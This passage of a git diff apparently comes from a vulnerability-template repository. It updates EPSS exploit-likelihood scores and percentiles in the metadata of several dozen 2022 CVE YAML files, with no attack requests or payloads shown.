cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2022/CVE-2022-31260.yaml b/http/cves/2022/CVE-2022-31260.yaml index 004e425d216..386bb787c15 100644 --- a/http/cves/2022/CVE-2022-31260.yaml +++ b/http/cves/2022/CVE-2022-31260.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31260 cwe-id: CWE-306 epss-score: 0.24772 - epss-percentile: 0.95968 + epss-percentile: 0.95972 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index 6232bd9ae2b..cff99194490 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31299 cwe-id: CWE-79 epss-score: 0.49706 - epss-percentile: 0.97716 + epss-percentile: 0.9771 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index e065e9a0adb..8c624ab2fe2 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.07967 - epss-percentile: 0.91814 + epss-percentile: 0.9181 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index ecb719e5fc6..582fe7eeaa1 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3142 cwe-id: CWE-89 epss-score: 0.10415 - epss-percentile: 0.93005 + epss-percentile: 0.92998 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31470.yaml b/http/cves/2022/CVE-2022-31470.yaml index aa8a55f6c41..0caf5ce2e25 100644 --- a/http/cves/2022/CVE-2022-31470.yaml +++ b/http/cves/2022/CVE-2022-31470.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31470 cwe-id: CWE-79 epss-score: 0.26012 - epss-percentile: 0.96115 + epss-percentile: 0.96118 cpe: cpe:2.3:a:axigen:webmail:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index d3005d436ad..1a4c59e6726 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31656 cwe-id: CWE-287 epss-score: 0.81259 - epss-percentile: 0.99128 + epss-percentile: 0.9913 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31711.yaml b/http/cves/2022/CVE-2022-31711.yaml index 096fbb2d11a..fd1f0ab37ca 100644 --- a/http/cves/2022/CVE-2022-31711.yaml +++ b/http/cves/2022/CVE-2022-31711.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5.3 cve-id: CVE-2022-31711 epss-score: 0.77486 - epss-percentile: 0.98938 + epss-percentile: 0.98937 cpe: cpe:2.3:a:vmware:vrealize_log_insight:*:*:*:*:*:*:*:* metadata: vendor: vmware diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 5e4106a3c12..e9f0eee0428 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-31847 cwe-id: CWE-425 epss-score: 0.58442 - epss-percentile: 0.98123 + epss-percentile: 0.98122 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 197dc065e50..fa951d66e9f 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31854 cwe-id: CWE-434 epss-score: 0.85495 - epss-percentile: 0.99338 + epss-percentile: 0.99337 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 13b79fbd83d..c88466ff809 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31974 cwe-id: CWE-89 epss-score: 0.17631 - epss-percentile: 0.94889 + epss-percentile: 0.94888 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 6d51bff8979..a24c3ea6582 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31975 cwe-id: CWE-89 epss-score: 0.17631 - epss-percentile: 0.94889 + epss-percentile: 0.94888 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index d9a524d38ff..a26c4bf7af4 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31977 cwe-id: CWE-89 epss-score: 0.38136 - epss-percentile: 0.97096 + epss-percentile: 0.97098 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index ce15ded881a..69f1c4707db 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31978 cwe-id: CWE-89 epss-score: 0.48185 - epss-percentile: 0.97638 + epss-percentile: 0.97633 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index ad0aa593e8d..bd8a030c5e7 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31984 cwe-id: CWE-89 epss-score: 0.23519 - epss-percentile: 0.95797 + epss-percentile: 0.95801 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index 1e1dd4a1943..fbd5d8006b2 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32007 cwe-id: CWE-89 epss-score: 0.16601 - epss-percentile: 0.94708 + epss-percentile: 0.94706 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 98addc02a5c..96fde4bdd24 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32015 cwe-id: CWE-89 epss-score: 0.16601 - epss-percentile: 0.94708 + epss-percentile: 0.94706 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index a7d743cf9fd..5b05c92185a 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32018 cwe-id: CWE-89 epss-score: 0.16601 - epss-percentile: 0.94708 + epss-percentile: 0.94706 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index cd83165aa60..97039171f35 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32022 cwe-id: CWE-89 epss-score: 0.11785 - epss-percentile: 0.93496 + epss-percentile: 0.9349 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 88961975018..16220db0816 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-32024 cwe-id: CWE-89 epss-score: 0.11785 - epss-percentile: 0.93496 + epss-percentile: 0.9349 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 300c6bb8a38..f409033c0a3 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32025 cwe-id: CWE-89 epss-score: 0.11785 - epss-percentile: 0.93496 + epss-percentile: 0.9349 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 6efc49f2594..c9341c3d7cc 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-32026 cwe-id: CWE-89 epss-score: 0.11785 - epss-percentile: 0.93496 + epss-percentile: 0.9349 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 3c517f03866..3e2152669d5 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32028 cwe-id: CWE-89 epss-score: 0.11785 - epss-percentile: 0.93496 + epss-percentile: 0.9349 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 4237c643358..e9fa99e73d9 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-32409 cwe-id: CWE-22 epss-score: 0.66547 - epss-percentile: 0.98475 + epss-percentile: 0.98478 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index a4d2dc5d99a..d79c2eca45b 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 epss-score: 0.15577 - epss-percentile: 0.94473 + epss-percentile: 0.94471 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index c654d687598..1eacf4c9790 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32770 cwe-id: CWE-79 epss-score: 0.13417 - epss-percentile: 0.93976 + epss-percentile: 0.93972 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 99e916c2cd8..59e731623be 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.09275 - epss-percentile: 0.92493 + epss-percentile: 0.92487 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index a61d194a820..e30f319c2e2 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-33119 cwe-id: CWE-79 epss-score: 0.02 - epss-percentile: 0.8323 + epss-percentile: 0.83228 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 2ab0185f050..03aafebf797 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-33174 cwe-id: CWE-863 epss-score: 0.81715 - epss-percentile: 0.99152 + epss-percentile: 0.99153 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33198.yaml b/http/cves/2022/CVE-2022-33198.yaml index febef67517d..b8f4b24057b 100644 --- a/http/cves/2022/CVE-2022-33198.yaml +++ b/http/cves/2022/CVE-2022-33198.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-33198 cwe-id: CWE-264,NVD-CWE-Other epss-score: 0.37457 - epss-percentile: 0.9706 + epss-percentile: 0.97062 cpe: cpe:2.3:a:oxilab:accordions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 87a11964953..49efe1b3919 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.1031 - epss-percentile: 0.92961 + epss-percentile: 0.92954 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index c4949f5a698..c0e2fda24cb 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-34045 cwe-id: CWE-798 epss-score: 0.36265 - epss-percentile: 0.96979 + epss-percentile: 0.96977 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 3db8a45722d..d5279ae2fec 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34048 cwe-id: CWE-79 epss-score: 0.049 - epss-percentile: 0.89289 + epss-percentile: 0.89286 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index 959d1335de2..16f25ca85eb 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34049 cwe-id: CWE-552 epss-score: 0.15517 - epss-percentile: 0.94454 + epss-percentile: 0.94452 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index d4f5ffa7788..e3fb41f587a 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34093 cwe-id: CWE-79 epss-score: 0.05106 - epss-percentile: 0.89523 + epss-percentile: 0.89521 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 92cf8fa2e52..3695a23e7f6 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34094 cwe-id: CWE-79 epss-score: 0.11346 - epss-percentile: 0.93338 + epss-percentile: 0.93332 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 4d420bfdd0b..685b7f9f624 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34121 cwe-id: CWE-829 epss-score: 0.27081 - epss-percentile: 0.96221 + epss-percentile: 0.96223 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34305.yaml b/http/cves/2022/CVE-2022-34305.yaml index c3846800f9d..9f43d0af13b 100644 --- a/http/cves/2022/CVE-2022-34305.yaml +++ b/http/cves/2022/CVE-2022-34305.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34305 cwe-id: CWE-79 - epss-score: 0.21613 - epss-percentile: 0.95549 + epss-score: 0.21088 + epss-percentile: 0.95472 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 220fce920ec..684bdb03c85 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.01813 - epss-percentile: 0.82391 + epss-percentile: 0.82389 cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34487.yaml b/http/cves/2022/CVE-2022-34487.yaml index f48585c3d16..d02b0c39914 100644 --- a/http/cves/2022/CVE-2022-34487.yaml +++ b/http/cves/2022/CVE-2022-34487.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-34487 cwe-id: CWE-264 epss-score: 0.52347 - epss-percentile: 0.97834 + epss-percentile: 0.97831 cpe: cpe:2.3:a:oxilab:shortcode_addons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index 98561af0b67..dbe3189317a 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-34534 cwe-id: CWE-200 epss-score: 0.28876 - epss-percentile: 0.96413 + epss-percentile: 0.96416 cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 9e37017d79d..8e8ef94047a 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34576 epss-score: 0.33416 - epss-percentile: 0.96787 + epss-percentile: 0.96789 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3477.yaml b/http/cves/2022/CVE-2022-3477.yaml index b6a4200c92b..b14bf821019 100644 --- a/http/cves/2022/CVE-2022-3477.yaml +++ b/http/cves/2022/CVE-2022-3477.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3477 cwe-id: CWE-287 epss-score: 0.55323 - epss-percentile: 0.97983 + epss-percentile: 0.97981 cpe: cpe:2.3:a:newsmag_project:newsmag:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 8bc4952958b..018a23c6244 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.03299 - epss-percentile: 0.86874 + epss-percentile: 0.86875 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 17636342f45..4b72ae49e09 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-3506 cwe-id: CWE-79 epss-score: 0.01295 - epss-percentile: 0.79269 + epss-percentile: 0.79265 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 89e9673c1a9..551ee9b41eb 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-35151 cwe-id: CWE-79 epss-score: 0.02487 - epss-percentile: 0.84907 + epss-percentile: 0.84902 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index dddc179b694..0a9a7191e84 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.06779 - epss-percentile: 0.91045 + epss-score: 0.06737 + epss-percentile: 0.91015 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index f08647e00eb..f33b96d15e9 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-35493 cwe-id: CWE-79 epss-score: 0.02192 - epss-percentile: 0.83963 + epss-percentile: 0.83958 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35507.yaml b/http/cves/2022/CVE-2022-35507.yaml index 7508ff7dbef..ca64cd29c1d 100644 --- a/http/cves/2022/CVE-2022-35507.yaml +++ b/http/cves/2022/CVE-2022-35507.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-35507 cwe-id: CWE-74 epss-score: 0.14332 - epss-percentile: 0.94204 + epss-percentile: 0.94201 cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3590.yaml b/http/cves/2022/CVE-2022-3590.yaml index ad90bc34594..d1707ea9e97 100644 --- a/http/cves/2022/CVE-2022-3590.yaml +++ b/http/cves/2022/CVE-2022-3590.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-3590 cwe-id: CWE-367 epss-score: 0.86525 - epss-percentile: 0.99389 + epss-percentile: 0.99392 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index a378a8dca54..69947592c51 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2022-35914 cwe-id: CWE-74 epss-score: 0.94395 - epss-percentile: 0.99972 + epss-percentile: 0.9997 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 348044c4ce7..8f8dfb06527 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-36446 cwe-id: CWE-116 epss-score: 0.93625 - epss-percentile: 0.99826 + epss-percentile: 0.99828 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index c80e3cc023d..ad77fb17b08 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-36537 cwe-id: CWE-200 epss-score: 0.93977 - epss-percentile: 0.9988 + epss-percentile: 0.99879 cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 1448072dad9..41de9ac26cf 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-36642 cwe-id: CWE-862 epss-score: 0.71462 - epss-percentile: 0.98677 + epss-percentile: 0.98676 cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 96a99d324e1..e1520233d7c 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-36804 cwe-id: CWE-77 epss-score: 0.94429 - epss-percentile: 0.99982 + epss-percentile: 0.99981 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 380a54569d4..c6fb57ccbac 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-36883 cwe-id: CWE-862 epss-score: 0.79615 - epss-percentile: 0.99048 + epss-percentile: 0.99047 cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36923.yaml b/http/cves/2022/CVE-2022-36923.yaml index 653dec8c96c..c6e42ee0bc2 100644 --- a/http/cves/2022/CVE-2022-36923.yaml +++ b/http/cves/2022/CVE-2022-36923.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-36923 - epss-score: 0.23665 - epss-percentile: 0.95812 + epss-score: 0.46848 + epss-percentile: 0.97566 cwe-id: CWE-755,CWE-284 cpe: 